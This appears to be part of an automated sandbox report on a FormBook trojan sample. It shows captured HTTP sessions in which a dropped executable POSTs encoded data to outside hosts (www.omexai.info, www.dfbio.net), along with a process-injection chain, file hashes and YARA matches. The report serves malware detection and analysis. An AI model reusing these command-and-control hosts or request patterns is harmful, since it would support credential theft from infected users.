                      Data Ascii: <p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></div></div></body><


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      25192.168.2.4497663.33.130.190801852C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      TimestampBytes transferredDirectionData
                      Sep 3, 2024 12:48:19.030272007 CEST711OUTPOST /45sz/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 201
                      Host: www.omexai.info
                      Origin: http://www.omexai.info
                      Referer: http://www.omexai.info/45sz/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 39 6d 34 57 67 54 43 6a 6f 2b 46 47 54 44 65 35 51 68 7a 66 51 6a 59 5a 2f 6d 2f 6b 50 4b 59 72 35 4e 42 41 52 55 74 58 34 46 4b 51 43 67 58 39 72 56 56 4e 66 4d 72 73 4a 58 70 45 56 45 2b 4f 4f 54 4b 6d 6a 68 71 31 4f 4c 68 45 4e 48 30 41 45 37 30 44 68 74 62 74 42 37 45 39 39 78 4e 6a 69 2f 4d 67 44 4b 53 30 4a 68 33 7a 57 68 4f 77 72 71 6a 75 7a 63 51 50 6b 6e 65 51 6d 44 53 39 59 38 37 4a 67 71 66 6b 30 32 66 61 7a 71 78 76 2b 48 30 71 2b 52 71 69 68 6e 31 45 45 51 74 65 43 59 67 72 33 4f 48 49 68 61 4c 57 59 56 71 62 70 36 4f 2f 78 66 47 64 58 6d 55 71 39 62 69 73 56 77 3d 3d
                      Data Ascii: TJY8=9m4WgTCjo+FGTDe5QhzfQjYZ/m/kPKYr5NBARUtX4FKQCgX9rVVNfMrsJXpEVE+OOTKmjhq1OLhENH0AE70DhtbtB7E99xNji/MgDKS0Jh3zWhOwrqjuzcQPkneQmDS9Y87Jgqfk02fazqxv+H0q+Rqihn1EEQteCYgr3OHIhaLWYVqbp6O/xfGdXmUq9bisVw==


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      26192.168.2.4497673.33.130.190801852C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      TimestampBytes transferredDirectionData
                      Sep 3, 2024 12:48:21.576808929 CEST731OUTPOST /45sz/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 221
                      Host: www.omexai.info
                      Origin: http://www.omexai.info
                      Referer: http://www.omexai.info/45sz/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 39 6d 34 57 67 54 43 6a 6f 2b 46 47 52 6a 4f 35 53 43 72 66 57 44 59 61 36 6d 2f 6b 56 36 59 6e 35 4e 4e 41 52 51 39 48 34 33 75 51 43 41 6e 39 36 6b 56 4e 65 4d 72 73 42 33 70 4c 62 6b 2f 43 4f 54 48 62 6a 6b 53 31 4f 4c 31 45 4e 47 45 41 45 49 4d 4d 6e 74 62 76 4f 62 45 2f 7a 52 4e 6a 69 2f 4d 67 44 4c 32 53 4a 68 76 7a 57 77 65 77 70 49 4c 70 77 63 51 4f 68 58 65 51 69 44 53 35 59 38 37 76 67 76 33 65 30 77 44 61 7a 75 35 76 77 79 41 70 6c 68 72 6e 6c 6e 30 49 53 51 4d 57 4b 4e 70 68 6f 49 72 32 6f 72 57 7a 64 54 37 42 34 4c 76 6f 6a 66 69 75 4b 68 64 65 77 59 66 6c 4f 79 7a 4e 68 42 45 6c 6f 6a 39 75 31 6f 35 58 65 75 59 30 4b 44 63 3d
                      Data Ascii: TJY8=9m4WgTCjo+FGRjO5SCrfWDYa6m/kV6Yn5NNARQ9H43uQCAn96kVNeMrsB3pLbk/COTHbjkS1OL1ENGEAEIMMntbvObE/zRNji/MgDL2SJhvzWwewpILpwcQOhXeQiDS5Y87vgv3e0wDazu5vwyAplhrnln0ISQMWKNphoIr2orWzdT7B4LvojfiuKhdewYflOyzNhBEloj9u1o5XeuY0KDc=


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      27192.168.2.4497683.33.130.190801852C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      TimestampBytes transferredDirectionData
                      Sep 3, 2024 12:48:24.193367004 CEST10813OUTPOST /45sz/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 10301
                      Host: www.omexai.info
                      Origin: http://www.omexai.info
                      Referer: http://www.omexai.info/45sz/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 39 6d 34 57 67 54 43 6a 6f 2b 46 47 52 6a 4f 35 53 43 72 66 57 44 59 61 36 6d 2f 6b 56 36 59 6e 35 4e 4e 41 52 51 39 48 34 33 6d 51 43 53 76 39 6f 33 4e 4e 5a 4d 72 73 41 33 70 62 62 6b 2b 59 4f 54 75 51 6a 6b 57 50 4f 4a 4e 45 4d 6b 4d 41 4e 5a 4d 4d 30 4e 62 76 57 62 45 2b 39 78 4e 4d 69 2f 63 6b 44 4b 47 53 4a 68 76 7a 57 79 32 77 67 36 6a 70 32 63 51 50 6b 6e 65 63 6d 44 54 75 59 38 7a 52 67 76 36 68 31 44 62 61 7a 4f 70 76 39 6b 73 70 34 52 72 70 72 48 31 56 53 51 41 5a 4b 4e 64 44 6f 4d 72 63 6f 72 79 7a 63 54 2b 4e 69 61 48 33 67 64 79 56 63 67 31 67 2b 35 6d 6d 47 42 76 6a 67 78 77 4b 31 58 6c 62 79 2f 45 37 4a 4e 41 75 64 31 54 61 6b 7a 2f 63 58 7a 6c 34 6a 78 6c 47 56 63 44 56 50 50 56 67 6e 7a 38 46 73 32 56 6f 57 4b 6e 48 51 38 45 41 38 65 73 42 36 6d 55 79 70 50 51 41 36 79 30 35 70 4d 66 69 66 63 50 7a 58 4f 46 45 70 53 4c 45 49 64 42 2f 6a 41 76 67 46 30 62 6e 4c 50 7a 57 4d 64 73 2f 4f 69 4b 58 58 6d 70 35 65 46 58 65 36 44 6e 51 58 66 54 47 6b 34 42 34 7a 57 50 59 57 [TRUNCATED]
                      Data Ascii: TJY8=9m4WgTCjo+FGRjO5SCrfWDYa6m/kV6Yn5NNARQ9H43mQCSv9o3NNZMrsA3pbbk+YOTuQjkWPOJNEMkMANZMM0NbvWbE+9xNMi/ckDKGSJhvzWy2wg6jp2cQPknecmDTuY8zRgv6h1DbazOpv9ksp4RrprH1VSQAZKNdDoMrcoryzcT+NiaH3gdyVcg1g+5mmGBvjgxwK1Xlby/E7JNAud1Takz/cXzl4jxlGVcDVPPVgnz8Fs2VoWKnHQ8EA8esB6mUypPQA6y05pMfifcPzXOFEpSLEIdB/jAvgF0bnLPzWMds/OiKXXmp5eFXe6DnQXfTGk4B4zWPYWWWjoQ9wc7KeITxg/lUsJlDuFsjbcsgZPeTSBjuAmMc2BOvRiTTpTiSrRURt9SZF4o7ehahPPmQfwX7XyKKhJ0CXQR2WAq9iAsSZsQm9zg4xt90sTwp7JLmcoIHAg0+RIKT5+/3y6wZqgq7yBI9U5+5yTqcPrAKIRQWa0NmPYvz4ytlGjP+mu9AvQC46y4ZnFBaR9VUz4MvOwijG/rcdf3pECGY9zvb8PSD54xcdZKFhIedtpk/34Q1LzLkxPsk6TVh0/J3duHrJ1WJikUTpNIt7f3lQCOwCYI3p8SGCh2F9sc3nTw3mit2yGVWPUZW+7WBN3VXYBIbKCFuW+LxeKxrA+Yb+Qp7rcqWkrEqU6+U1cF6t5avlkYT/JuwsS+djLLW6OkPvB/EgEl7VUJHhRUXo2gTXz8KhWU9/hG/WDdykXQ/w3wq160TZSJ8/wg4fP4ROtgNhJdCBhcRrUUBz+xO/2CojDp3gzpvUNj4ejvWmtYYVubRrqI9CovoxAwK53s76gj4fjyLNW7sZcB1xrl3WqunD2bEl/a4AiGqUyUh0azZS4ttpq3e/DTgiGUXEebFlTbTrzFO0vNYstObm2gZ5jQKT/NMvERg6m/eh8VJcQlrd3hM6g+Nt0rVbBwWLPtZnrWeF2qsiHnOA8eC9vn2Ka7Fjgg/xTHt [TRUNCATED]


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      28192.168.2.4497693.33.130.190801852C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      TimestampBytes transferredDirectionData
                      Sep 3, 2024 12:48:26.749244928 CEST451OUTGET /45sz/?3L7=cfJLLBshpRPDzp&TJY8=wkQ2jmS8yMxgRlKbDRWyNF0e8S7IapgV39hMR0do1D6sDTDom055RMGGVlZFQUvdDVO+pgeKf5JaLn1AK40x9uDDBeomzG9S18EgEY/2fSLTGleisJLGxPY= HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Language: en-us
                      Connection: close
                      Host: www.omexai.info
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Sep 3, 2024 12:48:27.189043999 CEST399INHTTP/1.1 200 OK
                      Server: openresty
                      Date: Tue, 03 Sep 2024 10:48:27 GMT
                      Content-Type: text/html
                      Content-Length: 259
                      Connection: close
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 33 4c 37 3d 63 66 4a 4c 4c 42 73 68 70 52 50 44 7a 70 26 54 4a 59 38 3d 77 6b 51 32 6a 6d 53 38 79 4d 78 67 52 6c 4b 62 44 52 57 79 4e 46 30 65 38 53 37 49 61 70 67 56 33 39 68 4d 52 30 64 6f 31 44 36 73 44 54 44 6f 6d 30 35 35 52 4d 47 47 56 6c 5a 46 51 55 76 64 44 56 4f 2b 70 67 65 4b 66 35 4a 61 4c 6e 31 41 4b 34 30 78 39 75 44 44 42 65 6f 6d 7a 47 39 53 31 38 45 67 45 59 2f 32 66 53 4c 54 47 6c 65 69 73 4a 4c 47 78 50 59 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?3L7=cfJLLBshpRPDzp&TJY8=wkQ2jmS8yMxgRlKbDRWyNF0e8S7IapgV39hMR0do1D6sDTDom055RMGGVlZFQUvdDVO+pgeKf5JaLn1AK40x9uDDBeomzG9S18EgEY/2fSLTGleisJLGxPY="}</script></head></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      29192.168.2.449770218.247.68.184801852C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      TimestampBytes transferredDirectionData
                      Sep 3, 2024 12:48:32.814332008 CEST705OUTPOST /yzen/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 201
                      Host: www.dfbio.net
                      Origin: http://www.dfbio.net
                      Referer: http://www.dfbio.net/yzen/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 44 2f 39 64 56 66 4a 59 76 71 39 47 44 69 6f 47 48 54 6e 55 57 53 33 44 65 58 6a 30 77 61 70 6d 66 76 66 75 53 61 72 39 63 6c 4b 55 6a 70 64 62 39 66 4b 30 59 70 74 65 56 37 31 56 37 78 41 58 46 76 2b 6f 7a 37 6c 67 56 6e 35 6f 33 55 71 38 65 62 64 6c 6c 59 43 6e 64 72 69 47 58 36 44 36 6b 72 2b 7a 45 6d 78 6d 34 65 51 69 4e 61 4e 62 67 57 61 32 66 6e 37 57 49 61 75 57 78 78 77 35 62 6c 70 6e 42 35 79 58 4b 72 37 35 4a 59 63 73 47 72 5a 62 51 30 79 56 54 4a 7a 69 4a 61 30 6e 52 5a 51 59 39 42 6b 37 78 41 63 32 77 58 62 4e 48 36 36 64 55 39 78 4c 36 59 44 30 2f 4f 46 42 63 77 3d 3d
                      Data Ascii: TJY8=D/9dVfJYvq9GDioGHTnUWS3DeXj0wapmfvfuSar9clKUjpdb9fK0YpteV71V7xAXFv+oz7lgVn5o3Uq8ebdllYCndriGX6D6kr+zEmxm4eQiNaNbgWa2fn7WIauWxxw5blpnB5yXKr75JYcsGrZbQ0yVTJziJa0nRZQY9Bk7xAc2wXbNH66dU9xL6YD0/OFBcw==
                      Sep 3, 2024 12:48:33.115880966 CEST705OUTPOST /yzen/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 201
                      Host: www.dfbio.net
                      Origin: http://www.dfbio.net
                      Referer: http://www.dfbio.net/yzen/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 44 2f 39 64 56 66 4a 59 76 71 39 47 44 69 6f 47 48 54 6e 55 57 53 33 44 65 58 6a 30 77 61 70 6d 66 76 66 75 53 61 72 39 63 6c 4b 55 6a 70 64 62 39 66 4b 30 59 70 74 65 56 37 31 56 37 78 41 58 46 76 2b 6f 7a 37 6c 67 56 6e 35 6f 33 55 71 38 65 62 64 6c 6c 59 43 6e 64 72 69 47 58 36 44 36 6b 72 2b 7a 45 6d 78 6d 34 65 51 69 4e 61 4e 62 67 57 61 32 66 6e 37 57 49 61 75 57 78 78 77 35 62 6c 70 6e 42 35 79 58 4b 72 37 35 4a 59 63 73 47 72 5a 62 51 30 79 56 54 4a 7a 69 4a 61 30 6e 52 5a 51 59 39 42 6b 37 78 41 63 32 77 58 62 4e 48 36 36 64 55 39 78 4c 36 59 44 30 2f 4f 46 42 63 77 3d 3d
                      Data Ascii: TJY8=D/9dVfJYvq9GDioGHTnUWS3DeXj0wapmfvfuSar9clKUjpdb9fK0YpteV71V7xAXFv+oz7lgVn5o3Uq8ebdllYCndriGX6D6kr+zEmxm4eQiNaNbgWa2fn7WIauWxxw5blpnB5yXKr75JYcsGrZbQ0yVTJziJa0nRZQY9Bk7xAc2wXbNH66dU9xL6YD0/OFBcw==
                      Sep 3, 2024 12:48:33.766237974 CEST1236INHTTP/1.1 404 Not Found
                      Server: wts/1.7.0
                      Date: Tue, 03 Sep 2024 10:48:33 GMT
                      Content-Type: text/html; charset=utf-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: private
                      Content-Encoding: gzip
                      Strict-Transport-Security: max-age=31536000
                      Data Raw: 38 36 63 0d 0a 1f 8b 08 00 00 00 00 00 04 0a b5 58 7b 6f db d6 15 ff 7b fe 14 b7 0a 1c 6c 80 28 52 92 e3 87 24 6b 48 fd 40 02 24 5d 10 bb eb 06 04 08 28 f1 ca 24 42 91 2a 79 6d d9 31 0a 38 69 ea 47 12 37 06 da 3c 1c bb 48 b2 26 a9 97 21 56 ba b6 76 6c 37 cd 87 a9 48 c9 7f ed 2b ec 9c 7b 49 89 b6 6c 0f 2d 30 07 91 45 f2 9c df 39 e7 77 5e 97 ce 7d 30 fc 97 a1 f1 bf 5f 1a 21 3a 2b 9b e4 d2 c7 1f 5e 38 3f 44 62 92 2c 7f 92 1e 92 e5 e1 f1 61 f2 b7 73 e3 17 2f 90 64 42 21 63 cc 31 8a 4c 96 47 3e 8a 91 98 ce 58 25 23 cb d5 6a 35 51 4d 27 6c 67 42 1e bf 2c 4f 23 4a 12 d5 82 af 92 cb 75 12 1a d3 62 79 d2 95 e3 56 a6 cb a6 e5 0e 1e 81 90 1c 18 18 10 8a 42 98 aa 1a 2a 31 83 99 34 7f fe fc 18 49 2a e0 46 b3 f6 b2 b1 37 bf ff f5 6a b3 56 23 12 e9 51 7a e0 a6 44 3e b2 19 19 b5 27 2d 2d 27 0b 05 d0 74 d9 8c 49 09 9b a9 d0 c1 18 a3 d3 4c 2e ba 2e 87 fe 40 92 48 57 c1 d6 66 66 cb aa 33 61 58 19 25 5b b2 2d 26 b9 c6 75 9a 49 f4 d1 b2 b8 2c a9 65 c3 9c c9 fc 95 3a 9a 6a a9 f1 b3 8e a1 9a f1 73 d4 9c a2 cc 28 aa 71 57 [TRUNCATED]
                      Data Ascii: 86cX{o{l(R$kH@$]($B*ym18iG7<H&!Vvl7H+{Il-0E9w^}0_!:+^8?Db,as/dB!c1LG>X%#j5QM'lgB,O#JubyVB*14I*F7jV#QzD>'--'tIL..@HWff3aX%[-&uI,e:js(qW\Q~FFpE)EUD2DRcBgmj(VNqZNl'= ]M:j%SpzMkT4zT*Dfx(@J|d%fW2LR6[Q5&2~j<LwH.S:0T7#3eKtZ-7R:l`$Ml(O!5%]h"`@u-f`TM)J((W)bJ-XEROxhLE$K5cAmq!~DVCU!1=3cB;,^Hu+C0Z,cx#]0Z60*w}`Qp/RBjSDGO]m{Shp|Z"@'"'<BdML[e-9|@PzMW1w8$.X"*f+0,!t1bV;sHg+gF`Q'SC
                      Sep 3, 2024 12:48:33.766331911 CEST1217INData Raw: c9 a1 d1 e1 e1 f0 39 0e aa c8 c3 9e b3 bd 43 fd 23 a2 a2 82 9e b3 6c a7 ac 9a 68 ab dd 52 38 98 db ae 64 79 1b aa a6 31 01 15 81 04 1e 41 43 3b 35 22 3e 68 3d a6 16 cc d6 4c 16 83 84 7f 06 35 91 54 94 ee c0 cb 56 5f 33 2d ce f4 59 60 16 97 8a 09
                      Data Ascii: 9C#lhR8dy1AC;5">h=L5TV_3-Y`MBjICJ\p=m`=,0NvuDyZA\)(B=)p $0'`HVZ\:, !pQd|`\$&UY&ua;<AMNGD'\`X"c


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      30192.168.2.449771218.247.68.184801852C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      TimestampBytes transferredDirectionData
                      Sep 3, 2024 12:48:35.355160952 CEST725OUTPOST /yzen/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 221
                      Host: www.dfbio.net
                      Origin: http://www.dfbio.net
                      Referer: http://www.dfbio.net/yzen/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 44 2f 39 64 56 66 4a 59 76 71 39 47 43 44 34 47 55 43 6e 55 58 79 33 45 56 33 6a 30 37 36 70 69 66 76 6a 75 53 62 2f 74 63 58 75 55 6a 4d 68 62 2b 61 6d 30 64 70 74 65 65 62 31 55 31 52 41 63 46 76 36 57 7a 2b 64 67 56 6e 46 6f 33 56 61 38 64 71 64 71 6d 6f 43 6c 45 62 69 41 54 36 44 36 6b 72 2b 7a 45 6d 6b 44 34 65 59 69 4f 71 64 62 69 30 79 31 53 48 37 52 4a 61 75 57 38 52 77 39 62 6c 70 52 42 38 71 75 4b 74 33 35 4a 64 67 73 43 70 78 59 46 6b 79 54 4d 35 79 33 45 36 70 43 56 4d 31 69 33 79 34 6e 35 7a 30 4d 31 52 4b 58 57 4c 62 4b 47 39 56 34 6e 66 4b 41 79 4e 34 49 48 32 51 65 4f 2f 57 48 75 62 45 54 59 6d 47 31 6d 76 77 72 48 53 34 3d
                      Data Ascii: TJY8=D/9dVfJYvq9GCD4GUCnUXy3EV3j076pifvjuSb/tcXuUjMhb+am0dpteeb1U1RAcFv6Wz+dgVnFo3Va8dqdqmoClEbiAT6D6kr+zEmkD4eYiOqdbi0y1SH7RJauW8Rw9blpRB8quKt35JdgsCpxYFkyTM5y3E6pCVM1i3y4n5z0M1RKXWLbKG9V4nfKAyN4IH2QeO/WHubETYmG1mvwrHS4=
                      Sep 3, 2024 12:48:36.350646019 CEST1236INHTTP/1.1 404 Not Found
                      Server: wts/1.7.0
                      Date: Tue, 03 Sep 2024 10:48:36 GMT
                      Content-Type: text/html; charset=utf-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: private
                      Content-Encoding: gzip
                      Strict-Transport-Security: max-age=31536000
                      Data Raw: 34 38 36 0d 0a 1f 8b 08 00 00 00 00 00 04 0a b5 58 7b 6f db d6 15 ff 7b fe 14 b7 0a 1c 6c 80 28 52 92 e3 87 24 6b 48 fd 40 02 24 5d 10 bb eb 06 04 08 28 f1 ca 24 42 91 2a 79 6d d9 31 0a 38 69 ea 47 12 37 06 da 3c 1c bb 48 b2 26 a9 97 21 56 ba b6 76 6c 37 cd 87 a9 48 c9 7f ed 2b ec 9c 7b 49 89 b6 6c 0f 2d 30 07 91 45 f2 9c df 39 e7 77 5e 97 ce 7d 30 fc 97 a1 f1 bf 5f 1a 21 3a 2b 9b e4 d2 c7 1f 5e 38 3f 44 62 92 2c 7f 92 1e 92 e5 e1 f1 61 f2 b7 73 e3 17 2f 90 64 42 21 63 cc 31 8a 4c 96 47 3e 8a 91 98 ce 58 25 23 cb d5 6a 35 51 4d 27 6c 67 42 1e bf 2c 4f 23 4a 12 d5 82 af 92 cb 75 12 1a d3 62 79 d2 95 e3 56 a6 cb a6 e5 0e 1e 81 90 1c 18 18 10 8a 42 98 aa 1a 2a 31 83 99 34 7f fe fc 18 49 2a e0 46 b3 f6 b2 b1 37 bf ff f5 6a b3 56 23 12 e9 51 7a e0 a6 44 3e b2 19 19 b5 27 2d 2d 27 0b 05 d0 74 d9 8c 49 09 9b a9 d0 c1 18 a3 d3 4c 2e ba 2e 87 fe 40 92 48 57 c1 d6 66 66 cb aa 33 61 58 19 25 5b b2 2d 26 b9 c6 75 9a 49 f4 d1 b2 b8 2c a9 65 c3 9c c9 fc 95 3a 9a 6a a9 f1 b3 8e a1 9a f1 73 d4 9c a2 cc 28 aa 71 57 [TRUNCATED]
                      Data Ascii: 486X{o{l(R$kH@$]($B*ym18iG7<H&!Vvl7H+{Il-0E9w^}0_!:+^8?Db,as/dB!c1LG>X%#j5QM'lgB,O#JubyVB*14I*F7jV#QzD>'--'tIL..@HWff3aX%[-&uI,e:js(qW\Q~FFpE)EUD2DRcBgmj(VNqZNl'= ]M:j%SpzMkT4zT*Dfx(@J|d%fW2LR6[Q5&2~j<LwH.S:0T7#3eKtZ-7R:l`$Ml(O!5%]h"`@u-f`TM)J((W)bJ-XEROxhLE$K5cAmq!~DVCU!1=3cB;,^Hu+C0Z,cx#]0Z60*w}`Qp/RBjSDGO]m{Shp|Z"@'"'<BdML[e-9|@PzMW1w8$.X"*f+0,!t1bV;sHg+gF`Q'SC
                      Sep 3, 2024 12:48:36.350668907 CEST1224INData Raw: c9 a1 d1 e1 e1 f0 39 0e aa c8 c3 9e b3 bd 43 fd 23 a2 a2 82 9e b3 6c a7 ac 9a 68 ab dd 52 38 98 db ae 64 79 1b aa a6 31 01 15 81 04 1e 41 43 3b 35 22 3e 68 3d a6 16 cc d6 4c 16 83 84 7f 06 35 91 54 94 ee c0 cb 56 5f 33 2d ce f4 59 60 16 97 8a 09
                      Data Ascii: 9C#lhR8dy1AC;5">h=L5TV_3-Y`MBjICJ\p=m`=,0NvuDyZA\)(B=)p $0'`HVZ\:, !pQd|`\$&UY&ua3e6;<AMNGD'\`X


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:06:45:29
                      Start date:03/09/2024
                      Path:C:\Users\user\Desktop\p4LNUqyKZM.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\p4LNUqyKZM.exe"
                      Imagebase:0x980000
                      File size:1'250'816 bytes
                      MD5 hash:4214BE98801C44F69B60490A3321E940
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:1
                      Start time:06:45:30
                      Start date:03/09/2024
                      Path:C:\Windows\SysWOW64\svchost.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\p4LNUqyKZM.exe"
                      Imagebase:0xf40000
                      File size:46'504 bytes
                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1885323394.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1885323394.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1884974857.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1884974857.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1889613718.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1889613718.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:2
                      Start time:06:45:42
                      Start date:03/09/2024
                      Path:C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe"
                      Imagebase:0x1b0000
                      File size:140'800 bytes
                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3536023408.0000000002D60000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.3536023408.0000000002D60000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:false

                      General

                      Target ID:3
                      Start time:06:45:43
                      Start date:03/09/2024
                      Path:C:\Windows\SysWOW64\chkntfs.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\SysWOW64\chkntfs.exe"
                      Imagebase:0x950000
                      File size:19'968 bytes
                      MD5 hash:A9B42ED1B14BB22EF07CCC8228697408
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3535173412.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3535173412.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
